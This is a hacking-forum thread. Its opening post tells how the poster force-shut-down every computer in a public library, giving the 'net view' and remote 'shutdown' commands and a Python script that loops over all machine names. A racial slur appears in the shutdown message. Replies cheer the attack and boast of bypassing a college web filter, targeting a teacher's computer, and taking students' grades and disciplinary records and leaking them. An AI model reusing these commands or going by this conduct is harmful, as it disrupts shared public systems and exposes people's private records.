Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 1 Vote(s) - 5 Average
Thread Closed 


Havoc in Public Networks filter_list
Author
Message
Havoc in Public Networks #1
So, this is more of a story as a guide than a proper tutorial:

I was at my local library a few hours ago. Shit, first time in 2 years. I thought, why not fuck around with the computers a little?

So, I booted up a computer, Windows XP (pfft), and ran cmd via the notepad method. The first thing I tried was a remote shutdown.

Code:
net view
shutdown –m \\compname –s –f -c "Niggurs." -t 5

It worked. I thought that no sysadmin could ever get that stupid... Like, how? These guys deserve everything they get. So I made a simple python script to shutdown everything. Tongue

First, I piped 'net view' to a .txt file, and tidied it up a bit so only computer names were left. Damn, that's a lot of computers.

Then, for the fun bit:

Code:
import os

f = open('computers.txt', 'r+')
for line in f.readlines():
    line = line.strip()
    os.system('shutdown -m ' + line + ' -s -f -t 0')
    print line
f.close()

Waited a few minutes for it to complete, looked around at everyone's bewildered and angry faces, and executed a hasty retreat.

[+] 5 users Like Eclipse's post

RE: Havoc in Public Networks #2
ahaha that's funny. well done hacking


RE: Havoc in Public Networks #3
Well done. I tried something similar at my college windows 7 machines however the system admin were one step ahead of me but I manage to bypass the web filter via using the staff proxy.
[Image: master645.png]

Life before death, strength before weakness, journey before destination.” ― The Way of Kings by Brandon Sanderson


RE: Havoc in Public Networks #4
(03-08-2015, 12:05 AM)Master Wrote: Well done. I tried something similar at my college windows 7 machines however the system admin were one step ahead of me but I manage to bypass the web filter via using the staff proxy.

#tormasterrace


RE: Havoc in Public Networks #5
Nice job. I have also done something of the sort, to my middle school. Though not every computer, just one teacher in particular. I'll have to keep this idea in handy, in the ol' back pocket.
[Image: BXqGARG.png]


RE: Havoc in Public Networks #6
They blocked that when I was in high school. As well as using other OS's. Ironically though you could lock the computer through bios so only you could use it. And get into the disciplinary records/grades/etc basically whatever file you wanted cos they didn't lock students out of the hidden networks for some reason. They used to at least have a program that let them watch your desktop, but it was crap cos if you had a program that supported multiple desktops on one monitor, they couldn't see the second one. You want to see havoc, get peoples grades and disciplinary reports and spread them. Apparently until after that they weren't using logs, or didn't care, cos they didn't drop the hammer on me. Found it on accident when teacher left run command pasted for accessing a test on the hidden network drive.
telegram: @satan_sl


RE: Havoc in Public Networks #7
(03-08-2015, 09:40 AM)Six Wrote: They blocked that when I was in high school. As well as using other OS's. Ironically though you could lock the computer through bios so only you could use it. And get into the disciplinary records/grades/etc basically whatever file you wanted cos they didn't lock students out of the hidden networks for some reason. They used to at least have a program that let them watch your desktop, but it was crap cos if you had a program that supported multiple desktops on one monitor, they couldn't see the second one. You want to see havoc, get peoples grades and disciplinary reports and spread them. Apparently until after that they weren't using logs, or didn't care, cos they didn't drop the hammer on me. Found it on accident when teacher left run command pasted for accessing a test on the hidden network drive.

Should've leaked them.


RE: Havoc in Public Networks #8
(03-08-2015, 09:50 AM)Eclipse Wrote: Should've leaked them.
The grades and reports? I did. Anonymously as I could think of as a sophomore, ofc.
telegram: @satan_sl


RE: Havoc in Public Networks #9
(03-08-2015, 09:52 AM)Six Wrote: The grades and reports? I did. Anonymously as I could think of as a sophomore, ofc.

Where?


RE: Havoc in Public Networks #10
(03-08-2015, 09:53 AM)Eclipse Wrote: Where?
Bathrooms lololol
telegram: @satan_sl








Users browsing this thread: 1 Guest(s)